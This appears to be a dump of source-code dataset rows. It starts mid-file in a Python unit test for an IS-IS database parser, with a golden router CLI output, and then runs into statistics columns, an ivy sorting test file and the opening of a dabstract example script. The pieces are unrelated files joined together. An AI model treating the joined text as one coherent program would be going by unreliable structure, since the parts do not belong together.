'sequence': '0x00000B05',
'checksum': '0x7FA7',
'lifetime': 1040,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '*',
'instance': '0x00000B05',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'router_id': '10.36.3.3',
'ip_address': '10.36.3.3',
'mt_entries': {
2: {
'att': 0,
'ol': 0,
},
0: {
'att': 0,
'ol': 0,
},
},
'hostname': 'R3_nx',
'length': 5,
'mt_is_neighbor': {
'R3_nx.00': {
'neighbor_id': 'R1_xe.02',
'metric': 40,
'topo_id': 2,
},
},
'extended_is_neighbor': {
'R2_xr.03': {
'neighbor_id': 'R2_xr.03',
'metric': 40,
},
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 40,
},
},
'extended_ip': {
'10.36.3.3/32': {
'metric': 1,
'up_down': 'U',
},
'10.13.115.0/24': {
'metric': 40,
'up_down': 'U',
},
'10.23.115.0/24': {
'metric': 40,
'up_down': 'U',
},
},
'mt_ipv6_prefix': {
'2001:3:3:3::3/128': {
'metric': 1,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
'2001:10:13:115::/64': {
'metric': 40,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
'2001:10:23:115::/64': {
'metric': 40,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
},
'digest_offset': 0,
},
},
},
},
'VRF1': {
'level_db': {
1: {
'R1_xe.00-00': {
'lsp_id': 'R1_xe.00-00',
'sequence': '0x000007CA',
'checksum': '0xC7FC',
'lifetime': 616,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C6',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'mt_entries': {
0: {
'att': 0,
'ol': 0,
},
2: {
'att': 0,
'ol': 0,
},
},
'hostname': 'R1_xe',
'length': 5,
'extended_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 10,
},
},
'mt_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 10,
'topo_id': 2,
},
},
'ip_address': '10.13.115.1',
'extended_ip': {
'10.12.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.13.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'ipv6_address': '2001:10:13:115::1',
'mt_ipv6_prefix': {
'2001:10:12:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:13:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'digest_offset': 0,
},
'R1_xe.02-00': {
'lsp_id': 'R1_xe.02-00',
'sequence': '0x000007C7',
'checksum': '0x0D6A',
'lifetime': 625,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C6',
'extended_is_neighbor': {
'R1_xe.00': {
'neighbor_id': 'R1_xe.00',
'metric': 0,
},
'R3_nx.00': {
'neighbor_id': 'R3_nx.00',
'metric': 0,
},
},
'digest_offset': 0,
},
'R3_nx.00-00': {
'lsp_id': 'R3_nx.00-00',
'sequence': '0x00000B09',
'checksum': '0x68C0',
'lifetime': 841,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '*',
'instance': '0x00000B09',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'router_id': '10.36.3.3',
'ip_address': '10.36.3.3',
'mt_entries': {
2: {
'att': 0,
'ol': 0,
},
0: {
'att': 0,
'ol': 0,
},
},
'hostname': 'R3_nx',
'length': 5,
'mt_is_neighbor': {
'R3_nx.00': {
'neighbor_id': 'R1_xe.02',
'metric': 40,
'topo_id': 2,
},
},
'extended_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 40,
},
},
'extended_ip': {
'10.36.3.3/32': {
'metric': 1,
'up_down': 'U',
},
'10.13.115.0/24': {
'metric': 40,
'up_down': 'U',
},
'10.23.115.0/24': {
'metric': 40,
'up_down': 'U',
},
},
'mt_ipv6_prefix': {
'2001:3:3:3::3/128': {
'metric': 1,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
'2001:10:13:115::/64': {
'metric': 40,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
'2001:10:23:115::/64': {
'metric': 40,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
},
'digest_offset': 0,
},
},
2: {
'R1_xe.00-00': {
'lsp_id': 'R1_xe.00-00',
'sequence': '0x000007CB',
'checksum': '0x25D3',
'lifetime': 908,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C6',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'mt_entries': {
0: {
'att': 0,
'ol': 0,
},
2: {
'att': 0,
'ol': 0,
},
},
'hostname': 'R1_xe',
'length': 5,
'extended_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 10,
},
},
'mt_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 10,
'topo_id': 2,
},
},
'ip_address': '10.13.115.1',
'extended_ip': {
'10.12.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.13.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.23.115.0/24': {
'metric': 50,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'ipv6_address': '2001:10:13:115::1',
'mt_ipv6_prefix': {
'2001:10:12:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:13:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:23:115::/64': {
'metric': 50,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'digest_offset': 0,
},
'R1_xe.02-00': {
'lsp_id': 'R1_xe.02-00',
'sequence': '0x000007C6',
'checksum': '0x27D9',
'lifetime': 1174,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C5',
'extended_is_neighbor': {
'R1_xe.00': {
'neighbor_id': 'R1_xe.00',
'metric': 0,
},
'R3_nx.00': {
'neighbor_id': 'R3_nx.00',
'metric': 0,
},
},
'digest_offset': 0,
},
'R3_nx.00-00': {
'lsp_id': 'R3_nx.00-00',
'sequence': '0x00000B06',
'checksum': '0x6EBD',
'lifetime': 1136,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '*',
'instance': '0x00000B06',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'router_id': '10.36.3.3',
'ip_address': '10.36.3.3',
'mt_entries': {
2: {
'att': 0,
'ol': 0,
},
0: {
'att': 0,
'ol': 0,
},
},
'hostname': 'R3_nx',
'length': 5,
'mt_is_neighbor': {
'R3_nx.00': {
'neighbor_id': 'R1_xe.02',
'metric': 40,
'topo_id': 2,
},
},
'extended_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 40,
},
},
'extended_ip': {
'10.36.3.3/32': {
'metric': 1,
'up_down': 'U',
},
'10.13.115.0/24': {
'metric': 40,
'up_down': 'U',
},
'10.23.115.0/24': {
'metric': 40,
'up_down': 'U',
},
},
'mt_ipv6_prefix': {
'2001:3:3:3::3/128': {
'metric': 1,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
'2001:10:13:115::/64': {
'metric': 40,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
'2001:10:23:115::/64': {
'metric': 40,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
},
'digest_offset': 0,
},
},
},
},
},
},
},
}
golden_output = {'execute.return_value': '''\
R3_nx# show isis database detail vrf all
IS-IS Process: test LSP database VRF: default
IS-IS Level-1 Link State Database
LSPID Seq Number Checksum Lifetime A/P/O/T
R1_xe.00-00 0x000007CD 0xAD22 1199 0/0/0/3
Instance : 0x000007C9
Area Address : 49.0001
NLPID : 0xCC 0x8E
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Hostname : R1_xe Length : 5
Extended IS : R1_xe.02 Metric : 10
TopoId: 2
MtExtend IS : R1_xe.02 Metric : 10
Extended IS : R1_xe.01 Metric : 10
TopoId: 2
MtExtend IS : R1_xe.01 Metric : 10
IP Address : 10.13.115.1
Extended IP : 10.12.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.13.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
IPv6 Address : 2001:10:13:115::1
MT-IPv6 Prefx : TopoId : 2
2001:10:12:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:13:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
Digest Offset : 0
R1_xe.01-00 0x000007C7 0x14CA 846 0/0/0/3
Instance : 0x000007C6
Extended IS : R1_xe.00 Metric : 0
Extended IS : R2_xr.00 Metric : 0
Digest Offset : 0
R1_xe.02-00 0x000007C7 0x0D6A 852 0/0/0/3
Instance : 0x000007C6
Extended IS : R1_xe.00 Metric : 0
Extended IS : R3_nx.00 Metric : 0
Digest Offset : 0
R2_xr.00-00 0x000007C5 0x94D6 887 0/0/0/3
Instance : 0x000007BD
Area Address : 49.0001
NLPID : 0xCC 0x8E
IP Address : 10.16.2.2
Extended IP : 10.16.2.2/32 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.12.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.23.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Hostname : R2_xr Length : 5
IPv6 Address : 2001:2:2:2::2
MT-IPv6 Prefx : TopoId : 2
2001:2:2:2::2/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:12:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:23:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Extended IS : R1_xe.01 Metric : 10
Extended IS : R2_xr.03 Metric : 10
TopoId: 2
MtExtend IS : R1_xe.01 Metric : 10
R2_xr.03 Metric : 10
Digest Offset : 0
R2_xr.03-00 0x000007C6 0x86AC 594 0/0/0/3
Instance : 0x000007C5
Extended IS : R2_xr.00 Metric : 0
Extended IS : R3_nx.00 Metric : 0
Digest Offset : 0
R3_nx.00-00 * 0x00000B05 0x7FA7 653 0/0/0/3
Instance : 0x00000B05
Area Address : 49.0001
NLPID : 0xCC 0x8E
Router ID : 10.36.3.3
IP Address : 10.36.3.3
MT TopoId : TopoId:2 Att: 0 Ol: 0
TopoId:0 Att: 0 Ol: 0
Hostname : R3_nx Length : 5
TopoId: 2
MtExtend IS : R2_xr.03 Metric : 40
R1_xe.02 Metric : 40
Extended IS : R2_xr.03 Metric : 40
Extended IS : R1_xe.02 Metric : 40
Extended IP : 10.36.3.3/32 Metric : 1 (U)
Extended IP : 10.13.115.0/24 Metric : 40 (U)
Extended IP : 10.23.115.0/24 Metric : 40 (U)
MT-IPv6 Prefx : TopoId : 2
2001:3:3:3::3/128 Metric : 1 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:10:13:115::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:10:23:115::/64 Metric : 40 (U/I)
Digest Offset : 0
IS-IS Level-2 Link State Database
LSPID Seq Number Checksum Lifetime A/P/O/T
R1_xe.00-00 0x000007C9 0xBB89 1087 0/0/0/3
Instance : 0x000007C4
Area Address : 49.0001
NLPID : 0xCC 0x8E
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Hostname : R1_xe Length : 5
Extended IS : R1_xe.02 Metric : 10
TopoId: 2
MtExtend IS : R1_xe.02 Metric : 10
Extended IS : R1_xe.01 Metric : 10
TopoId: 2
MtExtend IS : R1_xe.01 Metric : 10
IP Address : 10.13.115.1
Extended IP : 10.12.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.13.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.23.115.0/24 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
IPv6 Address : 2001:10:13:115::1
MT-IPv6 Prefx : TopoId : 2
2001:10:12:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:13:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:23:115::/64 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
Digest Offset : 0
R1_xe.01-00 0x000007C0 0x3A34 1137 0/0/0/3
Instance : 0x000007BF
Extended IS : R1_xe.00 Metric : 0
Extended IS : R2_xr.00 Metric : 0
Digest Offset : 0
R1_xe.02-00 0x000007C8 0x23DB 867 0/0/0/3
Instance : 0x000007C7
Extended IS : R1_xe.00 Metric : 0
Extended IS : R3_nx.00 Metric : 0
Digest Offset : 0
R2_xr.00-00 0x000007D1 0xE002 813 0/0/0/3
Instance : 0x000007C9
Area Address : 49.0001
NLPID : 0xCC 0x8E
IP Address : 10.16.2.2
Extended IP : 10.16.2.2/32 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.12.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.23.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.36.3.3/32 Metric : 11 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.13.115.0/24 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Hostname : R2_xr Length : 5
IPv6 Address : 2001:2:2:2::2
MT-IPv6 Prefx : TopoId : 2
2001:2:2:2::2/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:12:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:23:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:3:3:3::3/128 Metric : 11 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:13:115::/64 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Extended IS : R2_xr.03 Metric : 10
Extended IS : R1_xe.01 Metric : 10
TopoId: 2
MtExtend IS : R2_xr.03 Metric : 10
R1_xe.01 Metric : 10
Digest Offset : 0
R2_xr.03-00 0x000007C2 0x8EA8 784 0/0/0/3
Instance : 0x000007C1
Extended IS : R2_xr.00 Metric : 0
Extended IS : R3_nx.00 Metric : 0
Digest Offset : 0
R3_nx.00-00 * 0x00000B05 0x7FA7 1040 0/0/0/3
Instance : 0x00000B05
Area Address : 49.0001
NLPID : 0xCC 0x8E
Router ID : 10.36.3.3
IP Address : 10.36.3.3
MT TopoId : TopoId:2 Att: 0 Ol: 0
TopoId:0 Att: 0 Ol: 0
Hostname : R3_nx Length : 5
TopoId: 2
MtExtend IS : R2_xr.03 Metric : 40
R1_xe.02 Metric : 40
Extended IS : R2_xr.03 Metric : 40
Extended IS : R1_xe.02 Metric : 40
Extended IP : 10.36.3.3/32 Metric : 1 (U)
Extended IP : 10.13.115.0/24 Metric : 40 (U)
Extended IP : 10.23.115.0/24 Metric : 40 (U)
MT-IPv6 Prefx : TopoId : 2
2001:3:3:3::3/128 Metric : 1 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:10:13:115::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:10:23:115::/64 Metric : 40 (U/I)
Digest Offset : 0
IS-IS Process: test LSP database VRF: VRF1
IS-IS Level-1 Link State Database
LSPID Seq Number Checksum Lifetime A/P/O/T
R1_xe.00-00 0x000007CA 0xC7FC 616 0/0/0/3
Instance : 0x000007C6
Area Address : 49.0001
NLPID : 0xCC 0x8E
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Hostname : R1_xe Length : 5
Extended IS : R1_xe.02 Metric : 10
TopoId: 2
MtExtend IS : R1_xe.02 Metric : 10
IP Address : 10.13.115.1
Extended IP : 10.12.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.13.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
IPv6 Address : 2001:10:13:115::1
MT-IPv6 Prefx : TopoId : 2
2001:10:12:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:13:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
Digest Offset : 0
R1_xe.02-00 0x000007C7 0x0D6A 625 0/0/0/3
Instance : 0x000007C6
Extended IS : R1_xe.00 Metric : 0
Extended IS : R3_nx.00 Metric : 0
Digest Offset : 0
R3_nx.00-00 * 0x00000B09 0x68C0 841 0/0/0/3
Instance : 0x00000B09
Area Address : 49.0001
NLPID : 0xCC 0x8E
Router ID : 10.36.3.3
IP Address : 10.36.3.3
MT TopoId : TopoId:2 Att: 0 Ol: 0
TopoId:0 Att: 0 Ol: 0
Hostname : R3_nx Length : 5
TopoId: 2
MtExtend IS : R1_xe.02 Metric : 40
Extended IS : R1_xe.02 Metric : 40
Extended IP : 10.36.3.3/32 Metric : 1 (U)
Extended IP : 10.13.115.0/24 Metric : 40 (U)
Extended IP : 10.23.115.0/24 Metric : 40 (U)
MT-IPv6 Prefx : TopoId : 2
2001:3:3:3::3/128 Metric : 1 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:10:13:115::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:10:23:115::/64 Metric : 40 (U/I)
Digest Offset : 0
IS-IS Level-2 Link State Database
LSPID Seq Number Checksum Lifetime A/P/O/T
R1_xe.00-00 0x000007CB 0x25D3 908 0/0/0/3
Instance : 0x000007C6
Area Address : 49.0001
NLPID : 0xCC 0x8E
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Hostname : R1_xe Length : 5
Extended IS : R1_xe.02 Metric : 10
TopoId: 2
MtExtend IS : R1_xe.02 Metric : 10
IP Address : 10.13.115.1
Extended IP : 10.12.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.13.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.23.115.0/24 Metric : 50 (U)
Unknown Sub-TLV : Length : 1 Type : 4
IPv6 Address : 2001:10:13:115::1
MT-IPv6 Prefx : TopoId : 2
2001:10:12:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:13:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:23:115::/64 Metric : 50 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
Digest Offset : 0
R1_xe.02-00 0x000007C6 0x27D9 1174 0/0/0/3
Instance : 0x000007C5
Extended IS : R1_xe.00 Metric : 0
Extended IS : R3_nx.00 Metric : 0
Digest Offset : 0
R3_nx.00-00 * 0x00000B06 0x6EBD 1136 0/0/0/3
Instance : 0x00000B06
Area Address : 49.0001
NLPID : 0xCC 0x8E
Router ID : 10.36.3.3
IP Address : 10.36.3.3
MT TopoId : TopoId:2 Att: 0 Ol: 0
TopoId:0 Att: 0 Ol: 0
Hostname : R3_nx Length : 5
TopoId: 2
MtExtend IS : R1_xe.02 Metric : 40
Extended IS : R1_xe.02 Metric : 40
Extended IP : 10.36.3.3/32 Metric : 1 (U)
Extended IP : 10.13.115.0/24 Metric : 40 (U)
Extended IP : 10.23.115.0/24 Metric : 40 (U)
MT-IPv6 Prefx : TopoId : 2
2001:3:3:3::3/128 Metric : 1 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:10:13:115::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:10:23:115::/64 Metric : 40 (U/I)
Digest Offset : 0
R3_nx#
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowIsisDatabaseDetail(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowIsisDatabaseDetail(device=self.device)
parsed_output = obj.parse(vrf='all')
self.assertEqual(parsed_output, self.golden_parsed_output)
if __name__ == '__main__':
unittest.main()
| 50.8479
| 102
| 0.247856
| 9,861
| 150,103
| 3.639793
| 0.049792
| 0.016494
| 0.024072
| 0.026078
| 0.895353
| 0.881366
| 0.86061
| 0.835674
| 0.822941
| 0.80107
| 0
| 0.173896
| 0.66976
| 150,103
| 2,952
| 103
| 50.8479
| 0.550171
| 0.000107
| 0
| 0.68902
| 0
| 0.006254
| 0.341595
| 0.005757
| 0
| 0
| 0.009435
| 0
| 0.005212
| 1
| 0.005212
| false
| 0.000695
| 0.001737
| 0
| 0.022238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1cbc0dc680bb8483386400ed568bdb5162ba4541
| 3,002
|
py
|
Python
|
ivy_tests/test_ivy/test_functional/test_core/test_sorting.py
|
VedPatwardhan/ivy
|
7b2105fa8cf38879444a1029bfaa7f0b2f27717a
|
[
"Apache-2.0"
] | 1
|
2022-02-13T19:35:02.000Z
|
2022-02-13T19:35:02.000Z
|
ivy_tests/test_ivy/test_functional/test_core/test_sorting.py
|
Arijit1000/ivy
|
de193946a580ca0f54d78fe7fc4031a6ff66d2bb
|
[
"Apache-2.0"
] | null | null | null |
ivy_tests/test_ivy/test_functional/test_core/test_sorting.py
|
Arijit1000/ivy
|
de193946a580ca0f54d78fe7fc4031a6ff66d2bb
|
[
"Apache-2.0"
] | null | null | null |
"""Collection of tests for sorting functions."""
# global
from hypothesis import given, strategies as st
import numpy as np
# local
import ivy_tests.test_ivy.helpers as helpers
import ivy.functional.backends.numpy as ivy_np
# argsort
@given(
array_shape=helpers.lists(
st.integers(1, 5), min_size="num_dims", max_size="num_dims", size_bounds=[1, 5]
),
input_dtype=st.sampled_from(ivy_np.valid_dtypes),
data=st.data(),
as_variable=st.booleans(),
with_out=st.booleans(),
num_positional_args=helpers.num_positional_args(fn_name="argsort"),
native_array=st.booleans(),
container=st.booleans(),
instance_method=st.booleans(),
)
def test_argsort(
array_shape,
input_dtype,
data,
as_variable,
with_out,
num_positional_args,
native_array,
container,
instance_method,
fw,
):
# smoke for torch
if fw == "torch" and input_dtype in ["uint16", "uint32", "uint64"]:
return
# we do not want any nans
x = data.draw(
helpers.nph.arrays(shape=array_shape, dtype=input_dtype).filter(
lambda x: not np.any(np.isnan(x))
)
)
ndim = len(x.shape)
axis = data.draw(st.integers(-ndim, ndim - 1))
descending = data.draw(st.booleans())
stable = data.draw(st.booleans())
helpers.test_array_function(
input_dtype,
as_variable,
with_out,
num_positional_args,
native_array,
container,
instance_method,
fw,
"argsort",
x=x,
axis=axis,
descending=descending,
stable=stable,
)
# sort
@given(
array_shape=helpers.lists(
st.integers(1, 5), min_size="num_dims", max_size="num_dims", size_bounds=[1, 5]
),
input_dtype=st.sampled_from(ivy_np.valid_dtypes),
data=st.data(),
as_variable=st.booleans(),
with_out=st.booleans(),
num_positional_args=helpers.num_positional_args(fn_name="sort"),
native_array=st.booleans(),
container=st.booleans(),
instance_method=st.booleans(),
)
def test_sort(
array_shape,
input_dtype,
data,
as_variable,
with_out,
num_positional_args,
native_array,
container,
instance_method,
fw,
):
# smoke for torch
if fw == "torch" and input_dtype in ["uint16", "uint32", "uint64"]:
return
# we do not want any nans
x = data.draw(
helpers.nph.arrays(shape=array_shape, dtype=input_dtype).filter(
lambda x: not np.any(np.isnan(x))
)
)
ndim = len(x.shape)
axis = data.draw(st.integers(-ndim, ndim - 1))
descending = data.draw(st.booleans())
stable = data.draw(st.booleans())
helpers.test_array_function(
input_dtype,
as_variable,
with_out,
num_positional_args,
native_array,
container,
instance_method,
fw,
"sort",
x=x,
axis=axis,
descending=descending,
stable=stable,
)
| 23.453125
| 87
| 0.622252
| 385
| 3,002
| 4.636364
| 0.218182
| 0.078431
| 0.07619
| 0.038095
| 0.87619
| 0.87619
| 0.87619
| 0.87619
| 0.829132
| 0.829132
| 0
| 0.009888
| 0.258827
| 3,002
| 127
| 88
| 23.637795
| 0.79236
| 0.049634
| 0
| 0.830189
| 0
| 0
| 0.035211
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018868
| false
| 0
| 0.037736
| 0
| 0.075472
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1cfd904c7bbd0bb806cd967d9fc3db93d35b4b1c
| 110
|
py
|
Python
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/calculators/calc_dsa.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 82
|
2016-06-29T17:24:43.000Z
|
2021-04-16T06:49:17.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/calculators/calc_dsa.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 6
|
2022-01-12T18:22:08.000Z
|
2022-03-25T10:19:27.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/calculators/calc_dsa.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 56
|
2016-08-02T10:50:50.000Z
|
2021-07-19T08:57:34.000Z
|
from pyradioconfig.parts.jumbo.calculators.calc_dsa import CALC_DSA
class CALC_DSA_nixi(CALC_DSA):
pass
| 18.333333
| 67
| 0.818182
| 17
| 110
| 5
| 0.647059
| 0.329412
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118182
| 110
| 6
| 68
| 18.333333
| 0.876289
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
e80e340533f19e068f642fd4b182769288fe32d1
| 12,748
|
py
|
Python
|
examples/introduction/Readme_1_processing_chain.py
|
magics-tech/dabstract-1
|
9f7a2d99d0dff1df5c2f90c82b1eecc9c42c2c24
|
[
"MIT"
] | 7
|
2020-11-04T13:21:01.000Z
|
2021-12-14T13:08:04.000Z
|
examples/introduction/Readme_1_processing_chain.py
|
magics-tech/dabstract-1
|
9f7a2d99d0dff1df5c2f90c82b1eecc9c42c2c24
|
[
"MIT"
] | null | null | null |
examples/introduction/Readme_1_processing_chain.py
|
magics-tech/dabstract-1
|
9f7a2d99d0dff1df5c2f90c82b1eecc9c42c2c24
|
[
"MIT"
] | 2
|
2020-11-26T09:25:23.000Z
|
2021-09-22T12:05:14.000Z
|
import numpy as np
import os
from scipy.io.wavfile import write as audio_write
### Generate data
data = np.random.uniform(size=(10000)) # single example
DATA = np.random.uniform(size=(10,10000)) # multi example
wavfiles, numpyfiles = [], []
datafolder = 'data_intro/data'
os.makedirs(datafolder,exist_ok=True)
os.makedirs(datafolder + '_numpy',exist_ok=True)
for k,D in enumerate(DATA):
wavfiles.append(os.path.join(datafolder,str(k) + '.wav'))
numpyfiles.append(os.path.join(datafolder + '_numpy',str(k) + '.npy'))
np.save(numpyfiles[k], D)
audio_write(wavfiles[k], rate=1, data=D)
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# create processing chain
dp = ProcessingChain()
dp.add(Framing(windowsize=10,stepsize=10,axis=0))
dp.add(FFT(axis=1))
